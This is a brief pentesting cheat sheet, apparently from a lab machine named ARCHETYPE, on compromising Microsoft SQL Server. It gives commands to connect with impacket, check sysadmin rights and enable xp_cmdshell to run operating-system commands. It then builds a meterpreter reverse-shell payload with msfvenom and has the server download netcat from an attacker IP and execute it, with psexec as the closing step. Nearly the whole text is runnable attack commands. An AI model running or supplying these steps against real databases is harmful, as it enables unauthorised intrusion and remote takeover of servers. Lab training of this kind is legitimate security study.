Pentesting MsSql
ms-sql-s port 1433
Use
impacket mssqlclient.py
to connect
python mssqlclient.py ARCHETYPE/[email protected] -windows-auth
https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server
Check what is the role we have in the server
SELECT is_srvrolemember('sysadmin');
If the output is 1 , it translates to True .
Check to see if
xp_cmdshell
is enabled
SQL> EXEC xp_cmdshell 'net user';
Set up the command execution through the
xp_cmdshell
:
EXEC xp_cmdshell 'net user'; — privOn MSSQL 2005 you may need to reactivate xp_cmdshell
First as it’s disabled by default:
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
sp_configure; - Enabling the sp_configure as stated in the above error message
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Now we are able to execute system commands:
xp_cmdshell "whoami"
Better Command Execution
xp_cmdshell "powershell -c pwd"
Get a shell on target with
nc
ormsfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.15.154 LPORT=80 -f exe -o shell.exe
python3 -m http.server
xp_cmdshell "powershell -c cd C:\Users\sql_svc\Downloads; wget http://10.10.14.9/nc64.exe -outfile nc64.exe; ./nc64.exe"
Find the admin password from the shell
python /usr/local/bin/psexec.py [email protected]
Last updated